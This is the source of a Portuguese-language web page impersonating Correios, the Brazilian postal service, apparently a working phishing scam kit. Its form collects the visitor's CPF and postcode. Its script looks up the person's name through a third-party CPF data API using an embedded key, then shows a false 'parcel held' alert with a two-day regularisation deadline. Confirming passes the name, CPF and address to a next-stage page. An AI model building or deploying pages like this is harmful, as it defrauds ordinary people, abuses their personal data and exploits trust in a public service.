<!DOCTYPE html><html lang="pt-BR"><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="css/T3gemobpW5VO.css">
  <link rel="stylesheet" href="css/9qQMaqmNdeOZ.css">
  <link rel="stylesheet" href="css/cKb3AlTeB6hy.css">
  <link rel="stylesheet" href="css/ab6SeAyQI9Mx.css" crossorigin="anonymous" referrerpolicy="no-referrer">
  <title>Rastreie sua Encomenda</title>
  <script src="js/ZBUXy8x04cuM.js" data-utmify-prevent-subids="" async="" defer=""></script>
  <style>
    /* Estilos anteriores mantidos */
    #popup-overlay {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, 0.7);
      display: none;
      justify-content: center;
      align-items: center;
      z-index: 1000;
    }
    #popup-content {
      background: #fff;
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
      text-align: center;
      width: 90%;
      max-width: 400px;
      font-family: Arial, sans-serif;
    }
    .popup-logo {
      width: 120px;
      margin-bottom: 15px;
    }
    #popup-title {
      font-size: 1.5rem;
      font-weight: bold;
      color: #003157;
      margin-bottom: 15px;
    }
    .alert-message {
      font-size: 0.9rem;
      color: #856404;
      background-color: #fff3cd;
      border: 1px solid #ffeeba;
      border-radius: 5px;
      padding: 8px;
      margin-bottom: 15px;
    }
    .result-item {
      text-align: left;
      margin-bottom: 10px;
      font-size: 0.9rem;
    }
    .result-item strong {
      color: #003157;
    }
    #popup-nome-cliente {
      display: block;
      font-size: 0.85rem;
      word-wrap: break-word;
    }
    .button-group {
      margin-top: 20px;
    }
    .btn {
      padding: 8px 16px;
      font-size: 0.9rem;
      border-radius: 5px;
      cursor: pointer;
    }
    .btn-success {
      background-color: #28a745;
      color: white;
      border: none;
    }
    .btn-secondary {
      background-color: #6c757d;
      color: white;
      border: none;
      margin-left: 10px;
    }
    .spinner {
      width: 40px;
      height: 40px;
      border: 4px solid rgba(0, 0, 0, 0.1);
      border-top-color: #003157;
      border-radius: 50%;
      animation: spin 1s linear infinite;
      margin: 20px auto;
    }
    @keyframes spin {
      to { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <header class="w-100 font-size-16 font-weight-400 text-blue">
    <div class="w-100 bg-grey px-3 px-lg-3 py-1 border-bottom border-white">
      <span>Acessibilidade</span>
      <i class="fas fa-caret-down ml-1"></i>
    </div>
    <div class="">
      <nav class="w-100 d-flex align-items-center bg-grey-2 px-3 px-lg-3 py-1 border-bottom border-warning" style="height:48px">
        <div class="ml-0 ml-lg-1 d-flex justify-content-center" style="width:100%">
          <a href="#" class="py-2">
            <img src="images/vT0MdOoRgbe7.png" alt="" height="25">
          </a>
        </div>
        <div class="ml-4 d-none d-lg-block" style="width:150px">
          <a href="#" class="py-1 text-blue-dark border-left border-secondary px-3 text-decoration-none">
            <img src="images/QrnHCMl4MYgL.svg" alt="Correios" width="31">
            <span class="ml-1">Entrar</span>
          </a>
        </div>
      </nav>
    </div>
  </header>

  <main>
    <h1 class="mt-4 px-2 font-size-24 text-blue-dark font-weight-700 w-95 max-w-1000 d-flex justify-content-between" style="margin:0 auto;">
      Rastreamento
    </h1>

    <section class="mt-3 p-4 bg-grey-3 w-95 max-w-1000" style="margin:0 auto;">
      <form id="form-rastreamento">
        <span>Deseja acompanhar seu objeto?</span><br>
        <span>Digite o CPF do comprador.</span>
        <div class="form-group mt-1">
          <input type="text" name="cpf" class="form-control" placeholder="000.000.000-00" maxlength="14" required="" id="cpf">
        </div>
        <span>Informe o seu CEP abaixo.</span>
        <div class="form-group mt-1">
          <input type="text" name="cep" class="form-control" id="cep" placeholder="00000-000" maxlength="9" required="">
        </div>
        <div class="form-group mt-1 d-flex justify-content-center">
          <button type="submit" class="btn btn-primary" id="consultar-btn">Consultar</button>
        </div>
      </form>

      <div id="popup-overlay">
        <div id="popup-content">
          <img src="images/vT0MdOoRgbe7.png" alt="Correios Logo" class="popup-logo">
          <div id="loading-section">
            <div class="spinner" id="loading-spinner"></div>
            <p id="message-step">Iniciando a busca por pedidos vinculados ao nome...</p>
          </div>
          <div id="result-section" style="display:none;">
            <h2 id="popup-title">Resultado da Busca</h2>
            <p class="alert-message">Encomenda retida em uma de nossas agências</p>
            <div class="result-item">
              <strong>Destinatário:</strong> <span id="popup-nome-cliente"></span>
            </div>
            <div class="result-item">
              <strong>CEP:</strong> <span id="popup-cep-result"></span>
            </div>
            <div class="result-item">
              <strong>Endereço:</strong> <span id="popup-cep-rua"></span>
            </div>
            <div class="result-item">
              <strong>Cidade:</strong> <span id="popup-cep-cidade"></span>
            </div>
            <div class="result-item">
              <strong>Estado:</strong> <span id="popup-cep-estado"></span>
            </div>
            <div class="result-item">
              <strong>Prazo para regularização:</strong> <span id="popup-prazo"></span>
            </div>
            <div class="button-group">
              <button class="btn btn-success" id="confirmar-btn">SIM, SOU EU!</button>
              <button class="btn btn-secondary" id="close-popup">Fechar</button>
            </div>
          </div>
        </div>
      </div>
    </section>

    <section class="my-4 w-95 max-w-1000" style="margin:0 auto;">
      <div>
        <img src="images/8yfGYi6IcCsb.webp" alt="" class="w-100">
      </div>
    </section>
  </main>

  <footer class="d-flex flex-wrap px-5 py-4 bg-yellow text-blue-dark">
    <div class="w-30 min-w-300 px-0 px-lg-3 mb-3">
      <h5 class="font-weight-700 mb-4">Fale Conosco</h5>
      <ul>
        <li class="mb-2 font-size-14">
          <i class="fas fa-desktop"></i>
          <span class="text-wrap">Registro de Manifestações</span>
        </li>
        <li class="mb-2 font-size-14">
          <i class="fas fa-question-square mr-1"></i>
          <span class="text-wrap">Central de Atendimento</span>
        </li>
        <li class="mb-2 font-size-14">
          <i class="fas fa-briefcase"></i>
          <span class="text-wrap">Solucões para o seu negócio</span>
        </li>
        <li class="mb-2 font-size-14">
          <i class="fas fa-headset"></i>
          <span class="text-wrap">Suporte ao cliente com contrato</span>
        </li>
        <li class="mb-2 font-size-14">
          <i class="fas fa-comment-alt-dots"></i>
          <span>Ouvidoria</span>
        </li>
        <li class="mb-2 font-size-14">
          <i class="fas fa-user-headset"></i>
          <span>Denúncia</span>
        </li>
      </ul>
    </div>

    <div class="w-30 min-w-300 px-0 px-lg-3 mb-3">
      <h5 class="font-weight-700 mb-4">Sobre os Correios</h5>
      <ul>
        <li class="mb-2 font-size-14">
          <i class="fas fa-address-card"></i>
          <span>Identidade colaborativa</span>
        </li>
        <li class="mb-2 font-size-14">
          <i class="fas fa-user-graduate"></i>
          <span>Educação e cultura</span>
        </li>
        <li class="mb-2 font-size-14">
          <i class="fas fa-book-alt"></i>
          <span>Código de ética</span>
        </li>
        <li class="mb-2 font-size-14">
          <i class="fas fa-comment-alt-dots"></i>
          <span class="text-wrap">Política de privacidade e Notas legais</span>
        </li>
      </ul>
    </div>

    <div class="w-30 min-w-300 px-0 px-lg-3 mb-3">
      <h5 class="font-weight-700 mb-4">Outros Sites</h5>
      <ul>
        <li class="mb-2 font-size-14">
          <i class="fas fa-shopping-cart"></i>
          <span class="text-wrap">Loja online dos correios</span>
        </li>
      </ul>
    </div>

    <div class="d-flex justify-content-center w-100 px-3 mb-3 text-dark font-size-14">
      <span>© Copyright 2024 Correios</span>
    </div>
  </footer>
<script>
  document.getElementById('consultar-btn').addEventListener('click', async function () {
    const popupOverlay = document.getElementById('popup-overlay');
    const loadingSection = document.getElementById('loading-section');
    const resultSection = document.getElementById('result-section');
    const messageStep = document.getElementById('message-step');
    const messages = [
      "Iniciando a busca por pedidos vinculados ao nome...",
      "Produto localizado com sucesso...",
      "Aguarde...",
    ];

    popupOverlay.style.display = 'flex';
    loadingSection.style.display = 'block';
    resultSection.style.display = 'none';

    for (const message of messages) {
      messageStep.textContent = message;
      await new Promise(resolve => setTimeout(resolve, 2000));
    }

    try {
      const cpf = document.getElementById('cpf').value.replace(/\D/g, '');
      const cep = document.getElementById('cep').value.replace(/\D/g, '');

      // Nova API de CPF
      const nomeResponse = await fetch(`https://api.dataget.tech/?cpf=${cpf}&api_key=ISu11SQHjMJr`)
        .then(res => res.json())
        .catch(() => ({ dados: { nome: "Nome não disponível" } }));

      const cepResponse = await fetch(`https://viacep.com.br/ws/${cep}/json/`)
        .then(res => res.json())
        .catch(() => ({ cep: cep, logradouro: "Endereço não disponível", localidade: "Cidade não disponível", uf: "Estado não disponível" }));

      document.getElementById('popup-nome-cliente').textContent = nomeResponse.dados.nome || "Nome não disponível";
      document.getElementById('popup-cep-result').textContent = cepResponse.cep || cep;
      document.getElementById('popup-cep-rua').textContent = cepResponse.logradouro || "Endereço não disponível";
      document.getElementById('popup-cep-cidade').textContent = cepResponse.localidade || "Cidade não disponível";
      document.getElementById('popup-cep-estado').textContent = cepResponse.uf || "Estado não disponível";

      const prazo = new Date();
      prazo.setDate(prazo.getDate() + 2);
      document.getElementById('popup-prazo').textContent = prazo.toLocaleDateString('pt-BR');

      loadingSection.style.display = 'none';
      resultSection.style.display = 'block';
    } catch (error) {
      console.error('Erro ao buscar informações:', error);
      loadingSection.style.display = 'none';
      resultSection.style.display = 'block';
    }
  });

  // Funções de formatação e eventos mantidos
  document.getElementById('form-rastreamento').addEventListener('submit', async function(e) {
    e.preventDefault();
    document.getElementById('consultar-btn').click();
  });

  document.getElementById('confirmar-btn').addEventListener('click', function () {
    const cpf = document.getElementById('cpf').value.replace(/\D/g, '');
    const nome = document.getElementById('popup-nome-cliente').textContent;
    const cep = document.getElementById('popup-cep-result').textContent;
    const rua = document.getElementById('popup-cep-rua').textContent;
    const cidade = document.getElementById('popup-cep-cidade').textContent;
    const estado = document.getElementById('popup-cep-estado').textContent;

    const utmData = window.utmify ? window.utmify.getUtms() : {}; 

    const urlParams = new URLSearchParams({
      cpf: cpf,
      nome: encodeURIComponent(nome),
      cep: cep.replace(/\D/g, ''),
      rua: encodeURIComponent(rua),
      cidade: encodeURIComponent(cidade),
      estado: estado,
      ...utmData
    }); 

    const url = `../encomenda/index.html?${urlParams.toString()}`;
    console.log("Redirecionando para:", url);
    window.location.href = url;
  });

  document.getElementById('close-popup').addEventListener('click', function () {
    document.getElementById('popup-overlay').style.display = 'none';
  });

  // Funções de formatação de CPF e CEP mantidas
  function formatarCPF(cpf) {
    cpf = cpf.replace(/\D/g, '');
    if (cpf.length > 11) {
      cpf = cpf.slice(0, 11);
    }
    if (cpf.length <= 3) {
      return cpf;
    } else if (cpf.length <= 6) {
      return cpf.replace(/(\d{3})(\d+)/, "$1.$2");
    } else if (cpf.length <= 9) {
      return cpf.replace(/(\d{3})(\d{3})(\d+)/, "$1.$2.$3");
    } else {
      return cpf.replace(/(\d{3})(\d{3})(\d{3})(\d+)/, "$1.$2.$3-$4");
    }
  }

  function formatarCEP(cep) {
    cep = cep.replace(/\D/g, '');
    if (cep.length > 8) {
      cep = cep.slice(0, 8);
    }
    if (cep.length <= 5) {
      return cep;
    } else {
      return cep.replace(/^(\d{5})(\d+)/, "$1-$2");
    }
  }

  document.getElementById('cpf').addEventListener('input', function (e) {
    var start = this.selectionStart;
    var end = this.selectionEnd;
    var lastValue = this.value;
    this.value = formatarCPF(this.value);
    var newLength = this.value.length;
    var oldLength = lastValue.length;
    if (newLength > oldLength) {
      start += 1;
      end += 1;
    }
    this.setSelectionRange(start, end);
  });

  document.getElementById('cep').addEventListener('input', function (e) {
    var start = this.selectionStart;
    var end = this.selectionEnd;
    var lastValue = this.value;
    this.value = formatarCEP(this.value);
    var newLength = this.value.length;
    var oldLength = lastValue.length;
    if (newLength > oldLength) {
      start += 1;
      end += 1;
    }
    this.setSelectionRange(start, end);
  });
</script>

</body></html>